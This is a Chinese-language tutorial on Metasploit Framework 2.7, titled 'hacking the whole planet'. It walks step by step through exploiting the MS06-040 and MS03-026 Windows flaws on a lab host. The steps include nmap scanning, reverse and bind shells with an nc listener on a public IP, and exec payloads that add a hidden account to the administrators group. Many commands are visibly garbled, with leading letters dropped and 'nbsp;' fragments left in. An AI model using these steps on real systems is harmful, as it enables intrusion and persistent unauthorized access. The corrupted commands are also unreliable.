Metasploit Framework:黑掉整個星球
Metasploit Framework是一個編寫,測試和使用exploit代碼的完善環(huán)境。這個環(huán)境為滲透測試,shellcode編寫和漏洞研究提供了一個可靠的平臺,這個框架主要是由面向對象的Perl編程語言編寫的,并帶有由C語言,匯編程序和Python編寫的可選組件。
Metasploit Framework 作為一個緩沖區(qū)溢出測試使用的輔助工具,也可以說是一個漏洞利用和測試平臺。它集成了各平臺上常見的溢出漏洞和流行的shellcode,并且不斷更新,使得緩沖區(qū)溢出測試變得方便和簡單。
使用Metasploit安全測試工具在滲透測試中可以做很多事情,你可以保存你的日志、甚至定義每個有效負載在運行完成之后是如何將其自身清除的。值得一提的是這個強大的工具是免費的,它的開發(fā)團隊由兩個全職成員和少數(shù)兼職的投稿者組成,Metasploit Framework由最初的1.0版發(fā)展到現(xiàn)在的3.0版的漏洞自動化探測,成績驕人,精神可嘉!
下載鏈接:http://down.51cto.com/data/146158
使用方法
本文以Metasploit Framework 2.7為例,簡述它在命令模式下的使用方法。
1).安裝完成后運行MSFUpdate進行自動更新,如無更新將提示退出程序。如有更新,當出現(xiàn)Preserve modifications(yes or no)?時輸入"es"?行更新.
2).可以通過MSFConsole直接進入,也可以在Cygshell下輸入msfconsole進入框架命令模式下.
3).使用命令"elp"
可以看到里面有如下的命令:
"?"nbsp; :獲取幫助。
"d"nbsp; :更換當前的工作目錄。
"xit"nbsp; :退出。
"elp"nbsp; :獲取幫助。
"nfo"nbsp; :顯示當前程序的相關信息。
"uit"nbsp; :退出程序。
"eload"nbsp; :再載入Exploit和payloads。
"ave"nbsp; :保存當前設置
"etg"nbsp; :設置一個全局環(huán)境變量。
"nsetg"nbsp; :移除全局環(huán)境變量。
"how"nbsp; :顯示可用的Exploit和payloads。
"se"nbsp; :使用一個Exploit。
"ersion"nbsp;:顯示程序的版本。
例如使用ms06040這個漏洞,步驟如下(不唯一):
↓ show exploits //顯示可用的exploit,以BSD開頭的是針對BSD系統(tǒng)的ShellCode,以Linx開頭的是針對Linux系統(tǒng)的ShellCode,以CMD和WIN開頭的是針對Windows系統(tǒng)。
‖ info netapi_ms06_040 //查看這個exploit的相關信息
↓ use netapi_ms06_040 //使用這個exploit
‖ show options //顯示這個漏洞利用的參數(shù)
↓ set RHOST 192.168.1.11 //設置遠程主機地址這個參數(shù)
show targets //顯示exploit支持的操作系統(tǒng)類型
set TARGET 0 //設置目標為0所代表的那個操作系統(tǒng)類型
show payloads //顯示與正在使用的漏洞利用兼容的有效負載,說白了Payload就是我們平時說的ShellCode,不同的系統(tǒng)對不同的ShellCode要求是不一樣。
set PAYLOAD win32_exec //設置有效載荷為執(zhí)行特定命令
show options //顯示相關參數(shù)
set CMD "et user hello world /add"nbsp; //設置要執(zhí)行的命令為添加一個帳號
set //檢查環(huán)境設置
check //檢查目標是否存在相關漏洞
exploit //檢查無誤后即可進行溢出了
4).web模式下使用方法
運行Msfweb.bat,在IE地址欄中輸入http://127.0.0.1:55555即可看到操作界面。
單擊“select payload”選項進入Payload選擇界面, 選擇需要的Payload后就進入基本信息的設定界面,這里的設置和前面介紹的基本一致,等都設定好后,點
Vulnerability Check檢查目標系統(tǒng)是否存在相應的漏洞,點Launch Exploit進行溢出。
展望
最新的Metasploit 3.0版本使用的是Ruby編程語言(RUBY以很少的代碼實現(xiàn)很多功能而著稱),這說明RUBY已經逐漸被黑客社區(qū)所認可,是一個值得注意的新動向,雖然它和
NESSUS比起來可能是小巫見大巫,但也有自己獨到的地方,它的功能強大并且容易使用,對于我們日常的滲透來說是一款非常實用的工具。當然,你完全可以自己向這個工具中添加任何你認為對你有用的溢出工具包。
Metasploit 3.0主要的目標如下:
Improve automation of exploitation through scripting
Simplify the process of writing an exploit
Increase code re-use between exploits
Improve and generically integrate evasion techniques
Support automated network discovery and event correlation through recon modules
Continue to provide a friendly outlet for cutting edge exploitation technology
Metasploit的適應性和平臺多功能性都十分強大,加之功能強大,使用簡單等特性將使Metasploit成為業(yè)界流行的經典工具。
|=--------------------------=[ Metasploit 2.7的模擬攻擊 ]=--------------------------=|
本地主機:192.168.1.10
目標主機:192.168.1.11
1.開虛擬機,用nmap收集目標主機相關信息
要裝Winpcap后才能使用nmap
winpcap(windows packet capture)是windows平臺下一個免費,公共的網(wǎng)絡訪問系統(tǒng)。Winpcap可以為為win32應用程序提供訪問網(wǎng)絡底層的能力。
nmap -A 192.168.1.11 -oN C:\1.txt
2.目標主機開啟了msrpc服務
對應的exploit: msrpc_dcom_ms03_026
1).payload設置為win32_reverse時,為逆向連接。
set LHOST 192.168.1.10
思路:假如不是在一網(wǎng)段,可設置LHOST為一公網(wǎng)IP,然后在那臺主機上用nc監(jiān)聽特定的端口。
3.端口139,445開放,可利用ms06_040這個漏洞
不清楚目標操作系統(tǒng)時選擇自動
1).payload設置為win32_adduser
- set USER blueagle
- set PASS blueagle
2).payload設置為win32_bind
Windows Bind shell ,對windows shell的綁定
3).payload設置為win32_exec
- set CMD "et user blueagle blueagle /add"
- set CMD "et localgroup administrators blueagle /add"